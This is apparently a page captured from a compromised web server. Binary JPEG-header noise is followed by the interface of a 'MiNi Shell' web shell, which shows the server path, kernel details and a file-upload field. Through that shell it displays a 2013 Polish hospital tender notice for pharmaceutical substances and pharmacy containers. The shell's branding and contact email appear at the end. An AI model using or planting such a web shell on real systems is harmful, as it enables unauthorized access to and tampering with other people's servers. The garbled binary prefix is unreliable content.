JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130218/66396-N-2013.html

<p class="kh_header"><b>Łódź: Sprawa nr 170/12. Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawę produktów farmaceutycznych dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi.</b><br>
<b>Numer ogłoszenia: 66396 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawa nr 170/12. Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawę produktów farmaceutycznych dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów farmaceutycznych wyszczególnionych ilościowo i asortymentowo oraz opisanych w załączniku nr 1 i 1a do SIWZ.

Przedmiot zamówienia jest podzielony na 3 pakiety. Oferta może obejmować całość zamówienia lub wybrane pakiety..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   W trakcie obowiązywania umowy strony dopuszczają zmiany cen produktów farmaceutycznych będących przedmiotem umowy wyłącznie w przypadkach:

a)	zmiany stawki podatku VAT, przy czym w razie obniżenia stawki podatku VAT automatycznemu obniżeniu ulega cena brutto, natomiast cena netto pozostaje bez zmian, a w razie podwyższenia stawki podatku VAT strony mogą zawrzeć aneks mocą którego nastąpi podwyższenie ceny brutto przy pozostawieniu ceny netto bez zmian. Zmieniona stawka podatku VAT obowiązuje strony od dnia wejścia w życie odpowiednich przepisów prawa natomiast podwyższona cena brutto od dnia zawarcia aneksu, chyba że strony postanowią inaczej;
b)	zmiany cen urzędowych leków, w tym cen zbytu produktów farmaceutycznych stanowiących podstawę limitu w danej grupie limitowej, w granicach obniżenia lub podwyższenia  cen;
c)	wydania decyzji administracyjnej o objęciu produktu farmaceutycznego refundacją lub zmiany tej decyzji; 
a także zmiany poziomu refundacji leków, 
d)	zmiany produktu farmaceutycznego stanowiącego podstawę limitu w danej grupie limitowej,
e)	pogorszenia relacji PLN w stosunku do  waluty obcej EURO, USD lub CHF  mającej wpływ na cenę przedmiotu zamówienia o więcej niż 20% w stosunku do wartości kursu z dnia złożenia oferty przez Wykonawcę w sytuacji gdy przedstawi on Zamawiającemu dokumenty wskazujące jednoznacznie na związek przyczynowo skutkowy pomiędzy zmianą kursu waluty, a bezpośrednimi, zwiększonymi kosztami które musi ponieść Wykonawca realizując przedmiot umowy;
f)	zmiany cen na korzyść Zamawiającego.

2.     Zmiany cen, o których mowa w ust. 1, za wyjątkiem następujących automatycznie zmian: zmiany, która jest wynikiem obniżenia stawki podatku VAT oraz zmiany, która jest wynikiem obniżenia poziomu refundacji skutkującego obniżeniem ceny na korzyść Zamawiającego, mogą nastąpić jedynie na mocy pisemnego aneksu podpisanego przez obie strony umowy. Brak dojścia stron do porozumienia w terminie 30 dni od daty otrzymania przez jedną ze stron uzasadnionej, pisemnej propozycji od drugiej strony w sprawie zawarcia aneksu zmieniającego cenę (ceny), upoważnia Zamawiającego do rozwiązania umowy ze skutkiem natychmiastowym, w całości lub w części, bez prawa Wykonawcy do jakichkolwiek roszczeń z tego tytułu.  Tam gdzie zmiana następuje automatycznie, strony mogą zawrzeć aneks porządkujący, określający nową wysokość ceny.

3. 	O propozycji zmiany cen produktów farmaceutycznych, o której mowa w ust. 1 strona zainteresowana zmianą winna pisemnie poinformować drugą stronę załączając stosowny projekt aneksu, wraz z uzasadnieniem, o którym mowa w ust. 2  obejmujący propozycje nowych cen wraz z wykazem produktów farmaceutycznych, których te zmiany będą dotyczyć, wyznaczając stosowny termin do akceptacji zmian, nie krótszy jednak niż 30 dniowy od otrzymania uzasadnionej, pisemnej propozycji przez drugą stronę.

4.    Ponadto Zamawiający zastrzega sobie prawo do zmiany treści istotnych postanowień umowy na zasadach określonych w art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, a Wykonawca wyraża na to zgodę, w następujących przypadkach:
a) 	wydłużenia okresu trwania umowy na czas określony do 1 roku, z tym zastrzeżeniem iż łączny okres obowiązywania umowy nie może trwać dłużej niż 4 lata - w przypadku niewyczerpania całości asortymentu określonego w Załączniku nr 1 w terminie na jaki umowa została zawarta, przy zachowaniu ogólnej wartości brutto umowy bez zmian;
b)  	zmiany wielkości opakowania, dawki lub postaci w sytuacji wprowadzenia przez producenta/producentów danego produktu innej niż wskazana w załączniku do umowy opakowania, dawki lub postaci z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową,
c)  	wprowadzenia w miejsce produktu wskazanego w załączniku nr 1 do umowy odpowiednika chemicznego tego samego lub  innego producenta po cenie nie wyższej niż cena zawarta w umowie za dany produkt, w wypadku gdy będzie to uzasadnione:
- potrzebami terapeutycznymi; lub
- brakiem produktu w oryginalnym opakowaniu, dawce lub postaci, lub
- zmianami na listach refundacyjnych, lub
- zmianą produktu farmaceutycznego stanowiącego podstawę limitu w danej grupie limitowej.
d)  	zmianę ilości poszczególnych pozycji w pakietach w sytuacji gdy:
- 	nastąpi zmiana w zakresie liczby pacjentów korzystających ze świadczeń zdrowotnych Zamawiającego, bądź;
- 	wymagać tego będzie prawidłowa realizacja przez Zamawiającego zadań polegających na wykonywaniu świadczeń zdrowotnych, bądź;
- 	w wyniku zmiany prawa możliwe będzie dzięki temu podniesienie poziomu/jakości świadczeń wykonywanych przez Zamawiającego, bądź;
- 	w innych sytuacjach uzasadnionych wykonywaną przez Zamawiającego działalnością medyczną
e)  	wprowadzenia na rynek nowego, tańszego zamiennika produktu farmaceutycznego. Wówczas Zamawiający ma prawo zażądać zmiany zaproponowanego w ofercie produktu farmaceutycznego na nowy, tańszy zamiennik, a w przypadku odmowy Wykonawcy Zamawiający ma prawo skorzystać z uprawnień określonych w § 7 ust. 2 zdanie drugie, stosowanym odpowiednio.

5. 	Zmiana istotnych postanowień umowy, o której mowa w ust. 4, wymaga zgody obu stron umowy wyrażonej w formie pisemnej pod rygorem nieważności (aneks do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. M. Kopernika w Łodzi ul. Pabianicka 62, 93-513 Łódź, Dział Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny im. M. Kopernika w Łodzi ul. Pabianicka 62, 93-513 Łódź, Kancelaria Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1    	Acidum boricum	substancja	1 * g	  op  	8000
 2    	Acidum Salicylicum	substancja	1g	  op  	500
 3    	Acidum tannicum	substancja	1 * g	  op  	200
 4    	Aminophyllinum	substancja	1 * g	  op  	10
 5    	Ammonium sulfobituminicum,	podłoże	1 * g	  op  	4800
 6    	Argentum  nitricum	substancja	1 * g	  op  	900
 7    	Balsamum peruvianum	podłoże	1 * g	  op  	650
 8    	Calcium carbonicum	substancja	1 * g	  op  	6500
 9    	Codeinum	substancja	1 * g	  op  	170
 10    	Detreomycyna/Chloramphenicol/	substancja	1 * g	  op  	25
 11    	Ephedrinum  hydrochloricum,	substancja	1 * g	  op  	10
 12    	FORMALDEHYD 10%, płyn, 	płyn	1 * kg	  op  	1500
 13    	Glucosum	substancja	1 * g	  op  	15000
 14    	Kalium guajacolosulfonicum	substancja	1 * g	  op  	690
 15    	lanolinum anhydricum	podłoże	1 * g	  op  	12500
 16    	Lidocainum h/chloridum	substancja	1g	  op  	1200
 17    	Natrii chloridum	substancja	1 * g	  op  	3500
 18    	Natrii tetraboras	substancja	1 * g	  op  	10000
 19    	Natrium  bicarbonicum	substancja	1 * g	  op  	5000
 20    	Natrium  bromatum	substancja	1 * g	  op  	6000
 21    	Natrium benzoicum	substancja	1 * g	 op 	1250
 22    	Neomycinum Sulfuricum	substancja	1 * g	  op  	500
 23    	Nystatinum	substancja	1 * g	  op  	30
 24    	Oleum cacao	substancja	1 * g	  op  	1500
 25    	Papaverinum hydrochloricum	substancja	1 * g	  op  	180
 26    	Phenobarbitalum	substancja	1 * g	  op  	150
 27    	Pyoctaninum coeruelum	substancja	1 * g	  op  	100
 28    	Pyralginum	substancja	1 * g	  op  	5000
 29    	Saccharum  lactis,	substancja	1 * g	  op  	30
 30    	Sulfaguanidinum	substancja	1 * g	  op  	200
 31    	Talcum	substancja	1 * g	  op  	7000
 32    	Tussipect	płyn	1 * g	  op  	10000
 33    	Vaselinum  flavum	podłoże	1 * g	  op  	76000
 34    	Vaselinum album	podłoże	1 * g	  op  	72000
 35    	Zincum  oxydatum	substancja	1 * g	  op  	1450
 36    	BUTELKA APTECZNA BEZ NAKRĘTKI BRĄZOWA, POJ.125ML, ŚR.28, butelka, 125ML		1 * szt.	  op  	240
 37    	BUTELKA APTECZNA BEZ NAKRĘTKI BRĄZOWA, POJ.20ML, ŚR.18, butelka, 20 ml		1 * szt.	  op  	240
 38    	BUTELKA APTECZNA BEZ NAKRĘTKI BRĄZOWA, POJ.250ML, ŚR.28, butelka, 250ML		1 * szt.	  op  	500
 39    	BUTELKA APTECZNA BEZ NAKRĘTKI BRĄZOWA, POJ.500ML, ŚR.28, butelka, 500 ml		1 * szt.	  op  	400
 40    	FOREMKA DO CZOPKÓW O MASIE 3 G, , 		1 * szt.	  op  	1000
 41    	PODKŁADY PERGAMINOWE ŚR.100, , 		1 * szt.	  op  	2300
 42    	PUDEŁKO APTECZNE BIAŁE ZAKRYWANE 150ML		1 * szt.	  op  	1000
 43    	PUDEŁKO APTECZNE BIAŁE ZAKRYWANE 200ML		1 * szt.	  op  	250
 44    	Foremki do czopków 1g		1 szt	  op  	300
 45    	Opłatki skrobiowe nr.6		1 szt	  op  	14000
 46    	Pojemniki na maści do ungwatora 500/600ml		1 szt	  op  	8
 47    	Pojemniki na maści do ungwatora 300/390ml		1 szt	  op  	4
 48    	Torebka apteczna pomarańczowa 12x17 cm - 50g		1 szt	  op  	300
 49    	Zakraplacz do butelek 10 i 20ml		1 szt	  op  	250
50	Mieszadło do ugwatora typu EPRUS autom. E/S 9 500ml) śr.80mm dł robocza 133mm		1 szt	  op  	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	3% roztwór jodu w etanolu z dodatkiem jodku potasu	substancja	800 g	 op 	30
2	 Ammonium Chloratum 	substancja	 1 g 	 op 	800
3	Benzocainum	substancja	1 g	 op 	70
4	Benzyna	płyn	1 l	 op 	170
5	Calcium Lacticum	substancja	1 g	 op 	10
6	Chloramina T,	substancja	1 g	 op 	1 500
7	Chlorhexidinum Gluconicum 20%	płyn	500 g	 op 	20
8	Collodium	płyn	1 g	 op 	4 000
9	Ethacridinum Lactat	substancja	1 g	 op 	800
10	Ethanolum 96% (FPVI)	płyn	1 kg	 op 	150
11	Gentamicinum sulfas	substancja	1 g	 op 	30
12	Glicerynum 85%	substancja	1 g	 op 	25 000
13	Hydrocortisonum	substancja	1 g	 op 	200
14	Maść cholesterolowa, , 	maść	100 g	 op 	50
15	Mentholum,	substancja	1 g	 op 	60
16	Morphinum hydrochloridum	substancja	1 g	 op 	30
17	Oleum ricini	substancja	1 g	 op 	100
18	Paraffinum liquidum	substancja	1 g	 op 	100 000
19	Paraffinum Solidum	substancja	1 kg	 op 	100
20	Perhydrol 30%, 	substancja	1 g	 op 	150 000
21	Phenobarbitalum natrium	substancja	1 g	 op 	150
22	Pilocarpini  hydrochloridi,	substancja	1 g	 op 	6
23	Spirytus Salicylowy	substancja	1 g	 op 	40 000
24	Spirytus skażony hibitanem 0,5% roztwór	płyn na skórę	1 fl. 1000 ml	 op 	110
25	Tinctura Menthae  piperitae,	substancja	1 g	 op 	4 000
26	Tinctura Valerianae,	substancja	1 g	 op 	8 000
27	Urea  pura	substancja	100 g	 op 	20
28	Nakrętka śr.18		1 szt	 op 	600
29	Torebka Apteczna biała 10 x 17 cm - 50g		1 szt	 op 	400
30	Butelka apteczna bez nakrętki, brązowa poj. 100ml, śr. 28		1 szt	 op 	300
31	Mieszadło do unguatora typu EPRUS autom. E/S 100ml śr. 55mm, dł. Robocza 75mm		1 szt	 szt 	2
32	Mieszadło do unguatora typu EPRUS autom. E/S 1200ml śr. 55mm, dł. Robocza 133mm		1 szt	 szt 	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Butelki 1000ml śr. 28mm			but	1 200
2	Butelki 150 ml śr. 28mm			but	260
3	Butelki 15ml śr. 18mm			but	210
4	Nakrętki śr. 28mm		1 op. 100 szt.	op.	50
5	Opłatki skrobiowe no 2		1 op. 1000 szt	op.	5
6	Opłatki skrobiowe no 5		1 op. 1000 szt	op.	50
7	Pudełka białe apteczne 100 ml			szt	500
8	Eucerin	podłoże	g	g	40 000
9	Mieszadło do Ungwatora typu EPRUS automatyczne E/S 300 ml śr. 80 mm dł. Robocza 87mm			szt	6
10	Oleum Camphoratum	płyn	g	g	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com